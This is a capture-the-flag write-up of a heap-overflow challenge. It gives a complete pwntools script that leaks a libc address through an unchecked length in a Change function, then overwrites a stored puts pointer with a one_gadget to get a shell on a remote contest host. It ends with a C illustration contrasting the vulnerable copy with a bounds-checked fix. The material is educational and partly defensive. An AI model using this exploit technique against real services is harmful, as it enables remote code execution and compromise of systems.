# [Pwn] 强网先锋-AP

Author: mf (xp0int). Posted on May 27 2019.

1. A giveaway challenge. `Change` has an obvious heap overflow, and the binary helpfully stores the address of `puts` on the heap.
2. Call `Get` twice. Use the first record's heap overflow to write up to just before the second record's `puts` function pointer, print the record, and the six bytes that follow the padding are the address of `puts`.
3. Use the first record's overflow again to overwrite that `puts` pointer with a `one_gadget` address; calling `puts` on the second record then gives a shell.

![](https://leanote.com/api/file/getImage?fileId=5ceb4b89ab64413019001513)

The script:

```python
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
p = remote('117.78.60.139',30501)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

# Menu option 1: allocate a record with a name of the given length
def Get(length, name):
    p.sendlineafter('Choice >> ','1')
    p.sendlineafter('The length of my owner\'s name:', str(length))
    p.sendafter('Give me my owner\'s name:', name)

# Menu option 2: print record idx (calls its stored puts pointer)
def Open(idx):
    p.sendlineafter('Choice >> ','2')
    p.sendlineafter('would you want to open?',str(idx))

# Menu option 3: rewrite the name of record idx; the length is not
# checked against the original allocation, which is the heap overflow
def Change(idx,length,name):
    p.sendlineafter('Choice >> ','3')
    p.sendlineafter('you want to change it\'s owner\'s name?',str(idx))
    p.sendlineafter('The length of my owner\'s name:', str(length))
    p.sendafter('Give me my owner\'s name:', name)

# Two adjacent records
Get(0x20,'1'*0x10)
Get(0x20,'2'*0x10)

# Overflow record 0 with 56 bytes so that its name runs right up to
# record 1's puts pointer, then print record 0 to leak that pointer
Change(0,57,'3'*56)
Open(0)
p.recvuntil('3'*56)
leak = p.recv(6)
libc.address = u64(leak.ljust(8,'\x00')) - libc.symbols['puts']
p.info('libc.address: %s' % hex(libc.address))

# Overflow again, this time replacing record 1's puts pointer with
# one_gadget (offset for libc-2.23), then trigger it via Open(1)
one_gadget = 0x45216
Change(0,57 + 8,'3'*56 + p64(libc.address + one_gadget))
Open(1)

p.interactive()
```
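The root cause the writeup relies on is a `Change` routine that trusts a caller-supplied length instead of the size of the buffer it originally allocated. The C below is an added illustration, not code from the challenge binary or from the writeup's author: it models an owner record whose function pointer sits in front of a fixed-capacity name buffer (so an overflow from one record's name runs into the next record, as the writeup describes), and shows the unchecked `change_name_vulnerable` next to a `change_name_safe` that rejects any length the buffer cannot hold. The struct layout, `NAME_CAP`, and all function names are assumptions made for this example.

```c
/* Added example: models the record-plus-function-pointer pattern behind the
 * challenge. Layout, sizes and names are assumptions, not the real binary's. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_CAP 0x20 /* assumed capacity of the heap name buffer */

/* One heap record: a function pointer used to display the record, followed by
 * a fixed-capacity name. Two records allocated back to back put record 0's
 * name directly in front of record 1's chunk header and function pointer. */
struct owner {
    void (*show)(const char *);
    char name[NAME_CAP];
};

void show_name(const char *s) { puts(s); }

/* Allocate a record whose display routine is the real puts wrapper. */
struct owner *owner_new(const char *initial) {
    struct owner *o = calloc(1, sizeof *o);
    if (!o)
        return NULL;
    o->show = show_name;
    strncpy(o->name, initial, NAME_CAP - 1); /* calloc left the terminator */
    return o;
}

/* Vulnerable form: `length` comes straight from the user and is never compared
 * with NAME_CAP, so length > NAME_CAP writes past the buffer into whatever the
 * allocator placed next. Kept here only to show the defect; not exercised. */
void change_name_vulnerable(struct owner *o, size_t length, const char *src) {
    memcpy(o->name, src, length); /* no bound check: the heap overflow */
}

/* Hardened form: refuse any length the buffer cannot hold (leaving room for a
 * terminator) and report failure instead of corrupting the neighbouring chunk. */
int change_name_safe(struct owner *o, size_t length, const char *src) {
    if (length >= NAME_CAP)
        return -1;
    memcpy(o->name, src, length);
    o->name[length] = '\0';
    return 0;
}

int main(void) {
    struct owner *a = owner_new("first");
    struct owner *b = owner_new("second");
    char big[64];
    memset(big, '3', sizeof big); /* constructed oversized input, like '3'*56 */

    /* The safe variant rejects the 57-byte write the exploit relied on. */
    printf("change 57 bytes: %d\n", change_name_safe(a, 57, big));
    printf("change 16 bytes: %d\n", change_name_safe(a, 16, big));
    a->show(a->name);
    b->show(b->name); /* b's pointer is untouched, still show_name */

    free(a);
    free(b);
    return 0;
}
```

A length check alone is the minimum fix; a more robust `Change` would also store each record's allocated capacity alongside the name rather than recomputing it from the user's second length input.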